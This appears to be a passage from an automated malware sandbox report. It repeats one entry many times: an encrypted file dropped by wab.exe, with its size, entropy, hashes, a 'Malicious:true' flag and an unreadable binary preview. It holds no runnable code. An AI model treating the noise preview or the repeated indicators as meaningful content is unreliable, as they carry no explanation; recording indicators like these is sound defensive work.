                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
